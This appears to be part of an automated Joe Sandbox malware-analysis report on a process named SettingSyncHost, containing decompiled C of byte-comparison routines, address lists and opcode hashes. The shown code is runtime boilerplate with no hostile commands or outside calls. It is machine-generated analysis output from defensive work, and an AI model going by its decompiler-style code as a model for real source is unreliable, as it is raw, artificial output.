                                                                                                                                      											if(_t271 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											goto L73;
                                                                                                                                      										}
                                                                                                                                      										_t158 = (0 | _t274 > 0x00000000) - 1; // -1
                                                                                                                                      										_t271 = (_t274 > 0) + _t158;
                                                                                                                                      										if(_t271 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L71;
                                                                                                                                      									}
                                                                                                                                      									_t281 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                                                                                                                                      									if(_t281 == 0) {
                                                                                                                                      										L60:
                                                                                                                                      										_t283 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                                                                                                                                      										if(_t283 == 0) {
                                                                                                                                      											L62:
                                                                                                                                      											_t285 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                                                                                                                                      											if(_t285 == 0) {
                                                                                                                                      												L64:
                                                                                                                                      												_t271 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                                                                                                                                      												if(_t271 != 0) {
                                                                                                                                      													_t151 = (0 | _t271 > 0x00000000) - 1; // -1
                                                                                                                                      													_t271 = (_t271 > 0) + _t151;
                                                                                                                                      												}
                                                                                                                                      												goto L67;
                                                                                                                                      											}
                                                                                                                                      											_t145 = (0 | _t285 > 0x00000000) - 1; // -1
                                                                                                                                      											_t271 = (_t285 > 0) + _t145;
                                                                                                                                      											if(_t271 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											goto L64;
                                                                                                                                      										}
                                                                                                                                      										_t139 = (0 | _t283 > 0x00000000) - 1; // -1
                                                                                                                                      										_t271 = (_t283 > 0) + _t139;
                                                                                                                                      										if(_t271 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L62;
                                                                                                                                      									}
                                                                                                                                      									_t133 = (0 | _t281 > 0x00000000) - 1; // -1
                                                                                                                                      									_t271 = (_t281 > 0) + _t133;
                                                                                                                                      									if(_t271 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L60;
                                                                                                                                      								}
                                                                                                                                      								_t288 = (_t195 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                                                                                                                                      								if(_t288 == 0) {
                                                                                                                                      									L49:
                                                                                                                                      									_t290 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                                                                                                                                      									if(_t290 == 0) {
                                                                                                                                      										L51:
                                                                                                                                      										_t292 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                                                                                                                                      										if(_t292 == 0) {
                                                                                                                                      											L53:
                                                                                                                                      											_t271 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                                                                                                                                      											if(_t271 != 0) {
                                                                                                                                      												_t125 = (0 | _t271 > 0x00000000) - 1; // -1
                                                                                                                                      												_t271 = (_t271 > 0) + _t125;
                                                                                                                                      											}
                                                                                                                                      											goto L56;
                                                                                                                                      										}
                                                                                                                                      										_t119 = (0 | _t292 > 0x00000000) - 1; // -1
                                                                                                                                      										_t271 = (_t292 > 0) + _t119;
                                                                                                                                      										if(_t271 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L53;
                                                                                                                                      									}
                                                                                                                                      									_t113 = (0 | _t290 > 0x00000000) - 1; // -1
                                                                                                                                      									_t271 = (_t290 > 0) + _t113;
                                                                                                                                      									if(_t271 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L51;
                                                                                                                                      								}
                                                                                                                                      								_t107 = (0 | _t288 > 0x00000000) - 1; // -1
                                                                                                                                      								_t271 = (_t288 > 0) + _t107;
                                                                                                                                      								if(_t271 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L49;
                                                                                                                                      							}
                                                                                                                                      							_t295 = (_t194 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                                                                                                                                      							if(_t295 == 0) {
                                                                                                                                      								L38:
                                                                                                                                      								_t297 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                                                                                                                                      								if(_t297 == 0) {
                                                                                                                                      									L40:
                                                                                                                                      									_t299 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                                                                                                                                      									if(_t299 == 0) {
                                                                                                                                      										L42:
                                                                                                                                      										_t271 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                                                                                                                                      										if(_t271 != 0) {
                                                                                                                                      											_t100 = (0 | _t271 > 0x00000000) - 1; // -1
                                                                                                                                      											_t271 = (_t271 > 0) + _t100;
                                                                                                                                      										}
                                                                                                                                      										goto L45;
                                                                                                                                      									}
                                                                                                                                      									_t94 = (0 | _t299 > 0x00000000) - 1; // -1
                                                                                                                                      									_t271 = (_t299 > 0) + _t94;
                                                                                                                                      									if(_t271 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L42;
                                                                                                                                      								}
                                                                                                                                      								_t88 = (0 | _t297 > 0x00000000) - 1; // -1
                                                                                                                                      								_t271 = (_t297 > 0) + _t88;
                                                                                                                                      								if(_t271 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L40;
                                                                                                                                      							}
                                                                                                                                      							_t82 = (0 | _t295 > 0x00000000) - 1; // -1
                                                                                                                                      							_t271 = (_t295 > 0) + _t82;
                                                                                                                                      							if(_t271 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L38;
                                                                                                                                      						}
                                                                                                                                      						_t302 = (_t193 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                                                                                                                                      						if(_t302 == 0) {
                                                                                                                                      							L27:
                                                                                                                                      							_t304 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                                                                                                                                      							if(_t304 == 0) {
                                                                                                                                      								L29:
                                                                                                                                      								_t306 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                                                                                                                                      								if(_t306 == 0) {
                                                                                                                                      									L31:
                                                                                                                                      									_t271 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                                                                                                                                      									if(_t271 != 0) {
                                                                                                                                      										_t75 = (0 | _t271 > 0x00000000) - 1; // -1
                                                                                                                                      										_t271 = (_t271 > 0) + _t75;
                                                                                                                                      									}
                                                                                                                                      									goto L34;
                                                                                                                                      								}
                                                                                                                                      								_t69 = (0 | _t306 > 0x00000000) - 1; // -1
                                                                                                                                      								_t271 = (_t306 > 0) + _t69;
                                                                                                                                      								if(_t271 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L31;
                                                                                                                                      							}
                                                                                                                                      							_t63 = (0 | _t304 > 0x00000000) - 1; // -1
                                                                                                                                      							_t271 = (_t304 > 0) + _t63;
                                                                                                                                      							if(_t271 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L29;
                                                                                                                                      						}
                                                                                                                                      						_t57 = (0 | _t302 > 0x00000000) - 1; // -1
                                                                                                                                      						_t271 = (_t302 > 0) + _t57;
                                                                                                                                      						if(_t271 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L27;
                                                                                                                                      					}
                                                                                                                                      					_t309 = (_t192 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                                                                                                                                      					if(_t309 == 0) {
                                                                                                                                      						L16:
                                                                                                                                      						_t311 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                                                                                                                                      						if(_t311 == 0) {
                                                                                                                                      							L18:
                                                                                                                                      							_t313 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                                                                                                                                      							if(_t313 == 0) {
                                                                                                                                      								L20:
                                                                                                                                      								_t271 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                                                                                                                                      								if(_t271 != 0) {
                                                                                                                                      									_t50 = (0 | _t271 > 0x00000000) - 1; // -1
                                                                                                                                      									_t271 = (_t271 > 0) + _t50;
                                                                                                                                      								}
                                                                                                                                      								goto L23;
                                                                                                                                      							}
                                                                                                                                      							_t44 = (0 | _t313 > 0x00000000) - 1; // -1
                                                                                                                                      							_t271 = (_t313 > 0) + _t44;
                                                                                                                                      							if(_t271 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L20;
                                                                                                                                      						}
                                                                                                                                      						_t38 = (0 | _t311 > 0x00000000) - 1; // -1
                                                                                                                                      						_t271 = (_t311 > 0) + _t38;
                                                                                                                                      						if(_t271 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L18;
                                                                                                                                      					}
                                                                                                                                      					_t32 = (0 | _t309 > 0x00000000) - 1; // -1
                                                                                                                                      					_t271 = (_t309 > 0) + _t32;
                                                                                                                                      					if(_t271 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					goto L16;
                                                                                                                                      				} else {
                                                                                                                                      					__esi = __dl & 0x000000ff;
                                                                                                                                      					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                                      					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                                      					if(__esi == 0) {
                                                                                                                                      						L5:
                                                                                                                                      						__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                                      						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                                      						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                                      						if(__esi == 0) {
                                                                                                                                      							L7:
                                                                                                                                      							__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                                      							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L9:
                                                                                                                                      								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									__edx = 0;
                                                                                                                                      									_t25 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      									__esi = (__esi > 0) + _t25;
                                                                                                                                      								}
                                                                                                                                      								goto L12;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t19 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t19;
                                                                                                                                      							if(__edx + _t19 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L9;
                                                                                                                                      						}
                                                                                                                                      						__edx = 0;
                                                                                                                                      						__edx = 0 | __esi > 0x00000000;
                                                                                                                                      						_t13 = __edx - 1; // -1
                                                                                                                                      						__esi = __edx + _t13;
                                                                                                                                      						if(__edx + _t13 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L7;
                                                                                                                                      					}
                                                                                                                                      					__edx = 0;
                                                                                                                                      					__edx = 0 | __esi > 0x00000000;
                                                                                                                                      					_t7 = __edx - 1; // -1
                                                                                                                                      					__esi = __edx + _t7;
                                                                                                                                      					if(__edx + _t7 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					goto L5;
                                                                                                                                      				}
                                                                                                                                      				L1:
                                                                                                                                      				_t184 = _t271;
                                                                                                                                      				goto L2;
                                                                                                                                      			}






























                                                                                                                                      0x00000000
                                                                                                                                      0x0039d43d
                                                                                                                                      0x0039d418
                                                                                                                                      0x0039d418
                                                                                                                                      0x0039d41e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d41e
                                                                                                                                      0x0039d386
                                                                                                                                      0x0039d388
                                                                                                                                      0x0039d39d
                                                                                                                                      0x0039d3a5
                                                                                                                                      0x0039d3a7
                                                                                                                                      0x0039d3bc
                                                                                                                                      0x0039d3c4
                                                                                                                                      0x0039d3c6
                                                                                                                                      0x0039d3db
                                                                                                                                      0x0039d3e3
                                                                                                                                      0x0039d3e5
                                                                                                                                      0x0039d3ee
                                                                                                                                      0x0039d3ee
                                                                                                                                      0x0039d3ee
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d3e5
                                                                                                                                      0x0039d3cf
                                                                                                                                      0x0039d3cf
                                                                                                                                      0x0039d3d5
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d3d5
                                                                                                                                      0x0039d3b0
                                                                                                                                      0x0039d3b0
                                                                                                                                      0x0039d3b6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d3b6
                                                                                                                                      0x0039d391
                                                                                                                                      0x0039d391
                                                                                                                                      0x0039d397
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d397
                                                                                                                                      0x0039d2fe
                                                                                                                                      0x0039d300
                                                                                                                                      0x0039d315
                                                                                                                                      0x0039d31d
                                                                                                                                      0x0039d31f
                                                                                                                                      0x0039d334
                                                                                                                                      0x0039d33c
                                                                                                                                      0x0039d33e
                                                                                                                                      0x0039d353
                                                                                                                                      0x0039d35b
                                                                                                                                      0x0039d35d
                                                                                                                                      0x0039d366
                                                                                                                                      0x0039d366
                                                                                                                                      0x0039d366
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d35d
                                                                                                                                      0x0039d347
                                                                                                                                      0x0039d347
                                                                                                                                      0x0039d34d
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d34d
                                                                                                                                      0x0039d328
                                                                                                                                      0x0039d328
                                                                                                                                      0x0039d32e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d32e
                                                                                                                                      0x0039d309
                                                                                                                                      0x0039d309
                                                                                                                                      0x0039d30f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d30f
                                                                                                                                      0x0039d277
                                                                                                                                      0x0039d279
                                                                                                                                      0x0039d28e
                                                                                                                                      0x0039d296
                                                                                                                                      0x0039d298
                                                                                                                                      0x0039d2ad
                                                                                                                                      0x0039d2b5
                                                                                                                                      0x0039d2b7
                                                                                                                                      0x0039d2cc
                                                                                                                                      0x0039d2d4
                                                                                                                                      0x0039d2d6
                                                                                                                                      0x0039d2df
                                                                                                                                      0x0039d2df
                                                                                                                                      0x0039d2df
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d2d6
                                                                                                                                      0x0039d2c0
                                                                                                                                      0x0039d2c0
                                                                                                                                      0x0039d2c6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d2c6
                                                                                                                                      0x0039d2a1
                                                                                                                                      0x0039d2a1
                                                                                                                                      0x0039d2a7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d2a7
                                                                                                                                      0x0039d282
                                                                                                                                      0x0039d282
                                                                                                                                      0x0039d288
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d288
                                                                                                                                      0x0039d1f0
                                                                                                                                      0x0039d1f2
                                                                                                                                      0x0039d207
                                                                                                                                      0x0039d20f
                                                                                                                                      0x0039d211
                                                                                                                                      0x0039d226
                                                                                                                                      0x0039d22e
                                                                                                                                      0x0039d230
                                                                                                                                      0x0039d245
                                                                                                                                      0x0039d24d
                                                                                                                                      0x0039d24f
                                                                                                                                      0x0039d258
                                                                                                                                      0x0039d258
                                                                                                                                      0x0039d258
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d24f
                                                                                                                                      0x0039d239
                                                                                                                                      0x0039d239
                                                                                                                                      0x0039d23f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d23f
                                                                                                                                      0x0039d21a
                                                                                                                                      0x0039d21a
                                                                                                                                      0x0039d220
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d220
                                                                                                                                      0x0039d1fb
                                                                                                                                      0x0039d1fb
                                                                                                                                      0x0039d201
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d201
                                                                                                                                      0x0039d169
                                                                                                                                      0x0039d16b
                                                                                                                                      0x0039d180
                                                                                                                                      0x0039d188
                                                                                                                                      0x0039d18a
                                                                                                                                      0x0039d19f
                                                                                                                                      0x0039d1a7
                                                                                                                                      0x0039d1a9
                                                                                                                                      0x0039d1be
                                                                                                                                      0x0039d1c6
                                                                                                                                      0x0039d1c8
                                                                                                                                      0x0039d1d1
                                                                                                                                      0x0039d1d1
                                                                                                                                      0x0039d1d1
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d1c8
                                                                                                                                      0x0039d1b2
                                                                                                                                      0x0039d1b2
                                                                                                                                      0x0039d1b8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d1b8
                                                                                                                                      0x0039d193
                                                                                                                                      0x0039d193
                                                                                                                                      0x0039d199
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d199
                                                                                                                                      0x0039d174
                                                                                                                                      0x0039d174
                                                                                                                                      0x0039d17a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                      • Instruction ID: beb60b39669aba6a77464b6125a967ef0056a81d446d71afda6b034fff629dd2
                                                                                                                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                      • Instruction Fuzzy Hash: BFC18E73D1A5B20A8F77462D545923FEEA26E81B8231FC3A1CCD03F68DC626AD05D6D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4283097504-0
                                                                                                                                      • Opcode ID: bbe79f69fcbc6b647e43d5fa92d0113eafe6182dfd73c45af90749bc988c37d1
                                                                                                                                      • Instruction ID: f0ccd06e6e5dcaabc3fba7b30f7335fc4ed795105a42f7fdb36173a6e77976fe
                                                                                                                                      • Opcode Fuzzy Hash: bbe79f69fcbc6b647e43d5fa92d0113eafe6182dfd73c45af90749bc988c37d1
                                                                                                                                      • Instruction Fuzzy Hash: 46B129755007959BDB36AF26CC82BBBB3A8EF44308F15462DE943C66C0EB75E985CB10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039CD35(void* __eax, void* __ecx) {
                                                                                                                                      				void* _t177;
                                                                                                                                      				signed int _t178;
                                                                                                                                      				void* _t181;
                                                                                                                                      				signed char _t186;
                                                                                                                                      				signed char _t187;
                                                                                                                                      				signed char _t188;
                                                                                                                                      				signed char _t190;
                                                                                                                                      				signed char _t191;
                                                                                                                                      				signed int _t197;
                                                                                                                                      				signed int _t263;
                                                                                                                                      				void* _t266;
                                                                                                                                      				void* _t268;
                                                                                                                                      				void* _t270;
                                                                                                                                      				void* _t272;
                                                                                                                                      				void* _t274;
                                                                                                                                      				void* _t276;
                                                                                                                                      				void* _t279;
                                                                                                                                      				void* _t281;
                                                                                                                                      				void* _t283;
                                                                                                                                      				void* _t286;
                                                                                                                                      				void* _t288;
                                                                                                                                      				void* _t290;
                                                                                                                                      				void* _t293;
                                                                                                                                      				void* _t295;
                                                                                                                                      				void* _t297;
                                                                                                                                      				void* _t300;
                                                                                                                                      				void* _t302;
                                                                                                                                      				void* _t304;
                                                                                                                                      
                                                                                                                                      				_t181 = __ecx;
                                                                                                                                      				_t177 = __eax;
                                                                                                                                      				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                                                                                                                                      					_t263 = 0;
                                                                                                                                      					L11:
                                                                                                                                      					if(_t263 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					_t186 =  *(_t177 - 0x18);
                                                                                                                                      					if(_t186 ==  *(_t181 - 0x18)) {
                                                                                                                                      						_t263 = 0;
                                                                                                                                      						L22:
                                                                                                                                      						if(_t263 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						_t187 =  *(_t177 - 0x14);
                                                                                                                                      						if(_t187 ==  *(_t181 - 0x14)) {
                                                                                                                                      							_t263 = 0;
                                                                                                                                      							L33:
                                                                                                                                      							if(_t263 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							_t188 =  *(_t177 - 0x10);
                                                                                                                                      							if(_t188 ==  *(_t181 - 0x10)) {
                                                                                                                                      								_t263 = 0;
                                                                                                                                      								L44:
                                                                                                                                      								if(_t263 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                                                                                                                                      									_t263 = 0;
                                                                                                                                      									L55:
                                                                                                                                      									if(_t263 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									_t190 =  *(_t177 - 8);
                                                                                                                                      									if(_t190 ==  *(_t181 - 8)) {
                                                                                                                                      										_t263 = 0;
                                                                                                                                      										L66:
                                                                                                                                      										if(_t263 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										_t191 =  *(_t177 - 4);
                                                                                                                                      										if(_t191 ==  *(_t181 - 4)) {
                                                                                                                                      											_t178 = 0;
                                                                                                                                      											L78:
                                                                                                                                      											if(_t178 == 0) {
                                                                                                                                      												_t178 = 0;
                                                                                                                                      											}
                                                                                                                                      											L80:
                                                                                                                                      											return _t178;
                                                                                                                                      										}
                                                                                                                                      										_t266 = (_t191 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                                                                                                                                      										if(_t266 == 0) {
                                                                                                                                      											L70:
                                                                                                                                      											_t268 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                                                                                                                                      											if(_t268 == 0) {
                                                                                                                                      												L72:
                                                                                                                                      												_t270 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                                                                                                                                      												if(_t270 == 0) {
                                                                                                                                      													L75:
                                                                                                                                      													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                                                                                                                                      													if(_t178 != 0) {
                                                                                                                                      														_t176 = (0 | _t178 > 0x00000000) - 1; // -1
                                                                                                                                      														_t178 = (_t178 > 0) + _t176;
                                                                                                                                      													}
                                                                                                                                      													goto L78;
                                                                                                                                      												}
                                                                                                                                      												_t197 = (0 | _t270 > 0x00000000) + (0 | _t270 > 0x00000000) - 1;
                                                                                                                                      												if(_t197 == 0) {
                                                                                                                                      													goto L75;
                                                                                                                                      												}
                                                                                                                                      												L74:
                                                                                                                                      												_t178 = _t197;
                                                                                                                                      												goto L78;
                                                                                                                                      											}
                                                                                                                                      											_t197 = (0 | _t268 > 0x00000000) + (0 | _t268 > 0x00000000) - 1;
                                                                                                                                      											if(_t197 != 0) {
                                                                                                                                      												goto L74;
                                                                                                                                      											}
                                                                                                                                      											goto L72;
                                                                                                                                      										}
                                                                                                                                      										_t197 = (0 | _t266 > 0x00000000) + (0 | _t266 > 0x00000000) - 1;
                                                                                                                                      										if(_t197 != 0) {
                                                                                                                                      											goto L74;
                                                                                                                                      										}
                                                                                                                                      										goto L70;
                                                                                                                                      									}
                                                                                                                                      									_t272 = (_t190 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                                                                                                                                      									if(_t272 == 0) {
                                                                                                                                      										L59:
                                                                                                                                      										_t274 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                                                                                                                                      										if(_t274 == 0) {
                                                                                                                                      											L61:
                                                                                                                                      											_t276 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                                                                                                                                      											if(_t276 == 0) {
                                                                                                                                      												L63:
                                                                                                                                      												_t263 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                                                                                                                                      												if(_t263 != 0) {
                                                                                                                                      													_t151 = (0 | _t263 > 0x00000000) - 1; // -1
                                                                                                                                      													_t263 = (_t263 > 0) + _t151;
                                                                                                                                      												}
                                                                                                                                      												goto L66;
                                                                                                                                      											}
                                                                                                                                      											_t145 = (0 | _t276 > 0x00000000) - 1; // -1
                                                                                                                                      											_t263 = (_t276 > 0) + _t145;
                                                                                                                                      											if(_t263 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											goto L63;
                                                                                                                                      										}
                                                                                                                                      										_t139 = (0 | _t274 > 0x00000000) - 1; // -1
                                                                                                                                      										_t263 = (_t274 > 0) + _t139;
                                                                                                                                      										if(_t263 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L61;
                                                                                                                                      									}
                                                                                                                                      									_t133 = (0 | _t272 > 0x00000000) - 1; // -1
                                                                                                                                      									_t263 = (_t272 > 0) + _t133;
                                                                                                                                      									if(_t263 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L59;
                                                                                                                                      								}
                                                                                                                                      								_t279 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                                                                                                                                      								if(_t279 == 0) {
                                                                                                                                      									L48:
                                                                                                                                      									_t281 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                                                                                                                                      									if(_t281 == 0) {
                                                                                                                                      										L50:
                                                                                                                                      										_t283 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                                                                                                                                      										if(_t283 == 0) {
                                                                                                                                      											L52:
